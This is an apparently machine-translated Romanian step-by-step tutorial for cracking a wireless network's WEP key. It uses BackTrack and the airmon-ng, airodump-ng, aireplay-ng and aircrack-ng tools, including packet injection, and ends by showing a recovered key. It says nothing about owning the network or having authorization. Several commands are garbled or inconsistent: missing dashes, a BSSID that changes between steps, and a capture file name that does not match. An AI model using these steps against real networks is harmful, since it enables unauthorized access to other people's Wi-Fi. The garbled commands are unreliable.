1
Utilizați Linux. Windows nu poate capta pachete WEP, dar puteți folosi un CD Linux de boot.
2
Obțineți software pentru sniffer. Backtrack este o opțiune frecvent utilizată. Descărcați imaginea iso și ardeți-o pe un CD / DVD bootabil.
3
Boot sau boot Linux și Backtrack.- Rețineți că acest sistem de operare nu trebuie să fie instalat pe hard disk. Aceasta înseamnă că de fiecare dată când opriți backtrack-ul, toate informațiile de pe backtrack vor fi pierdute.
4
Selectați o opțiune de pornire. Următorul ecran Backtrack va fi afișat după boot. Modificați opțiunea utilizând săgețile sus și jos și selectați una. Acest tutorial va utiliza prima opțiune.
5
Încărcați interfața grafică prin linia de comandă. În această opțiune, Backtrack este inițializat numai în linia de comandă sau terminal. Introduceți comanda startx pentru a continua și a inițializa interfața grafică.
6
Faceți clic pe butonul Terminal din partea stângă. Aceasta ar trebui să fie a cincea opțiune.
7
Așteptați ca terminalul de comandă Linux să se încarce.
8
Verificați tipul WLAN. Tastați următoarea comandă: "airmon-ng" (fără ghilimele). Ar trebui să vedeți ceva asemănător: "wlan0 beneatg interface", care indică faptul că interfața sa se numește wlan0.
9
Obțineți toate informațiile necesare despre punctul de acces. Tastați următoarea comandă: "airodump-ng wlan0" (fără ghilimele). Ar trebui să obțineți 3 lucruri:
- BSSID (adresa MAC a AP)
- Canal (Canal de transmisie de date)
- ESSID (numele AP)
- Iată ce a returnat experimentul tutorial:
- BSSID 00: 17: 3F: 76: 36: 6E
- Număr canal sau canal 1
- ESSID (numele AP) Suleman
10
Tastați următoarea comandă. Aceasta va folosi informațiile din exemplul de mai sus, dar ar trebui să introduceți propriile informații. Comandă: "airodump-ng -w wep -c 1-bssid 00: 17: 3F: 76: 36: 6E wlan0" (fără ghilimele).
11
Permiteți software-ului să ruleze.
12
Deschideți o nouă fereastră terminal. Tastați următoarea comandă, înlocuind valorile cu propriul BSSID, Canal și ESSID. Comandă: "aireplay-ng -1 0 -a 00: 17: 3F: 76: 36: 6E" (fără ghilimele).
13
Deschideți o altă fereastră terminală. Tastați următoarea comandă: "aireplay-ng -3 -b 00: 17: eF: 76: 36: 6E" (fără ghilimele).
14
Permiteți software-ului să ruleze.
15
Du-te înapoi la prima fereastră terminal.
16
Permiteți date ("data") în această fereastră să ajungă la 30.000 sau mai mult. Acest lucru va dura aproximativ 15-60 de minute sau mai mult, în funcție de semnalul wireless, de utilizarea hardware și de încărcare în punctul de acces.
17
Mergeți la cel de-al treilea terminal și apăsați pe Ctrl + C.
18
Listează fișierele. Introduceți una dintre următoarele comenzi: "dir" sau "ls" (fără ghilimele)
19
Utilizați un fișier cu capac. Pentru exemplul nostru ar fi următorul: "aircrack-ng web-02.cap" (fără citate). Urmează execuția următoare.
20
Spargeți cheia criptografică WEP. După finalizarea acestui proces, veți putea rupe cheia. În acest exemplu, cheia a fost {ADA2D18D2E}.